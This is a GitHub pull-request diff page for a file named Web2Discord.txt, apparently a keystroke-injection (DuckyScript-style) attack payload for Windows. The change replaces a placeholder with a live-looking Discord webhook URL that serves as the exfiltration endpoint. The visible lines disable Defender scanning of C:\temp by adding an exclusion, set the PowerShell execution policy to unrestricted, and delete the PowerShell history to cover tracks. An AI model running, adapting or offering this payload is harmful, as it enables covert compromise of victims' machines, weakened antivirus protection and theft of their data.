Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
4 changes: 2 additions & 2 deletions web2Discord/Web2Discord.txt
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@ ENTER
DELAY 1500
ALT y
DELAY 1000
STRING $webhook = '%WEBHOOK%'
STRING $webhook = 'https://discord.com/api/webhooks/1336560699106660382/CdIsNbkiVQcjYy4m2WKBUXafLDR5awWd324lq5sjTvw7OTVA9Gf6a8GomfspyTJ-a-rv'
ENTER
DELAY 500
STRING cd C:\ ; mkdir temp ; cd temp ; Add-MpPreference -ExclusionPath "C:\temp" ; Set-ExecutionPolicy unrestricted
Expand Down Expand Up @@ -54,4 +54,4 @@ STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
ENTER
DELAY 500
STRING exit
ENTER
ENTER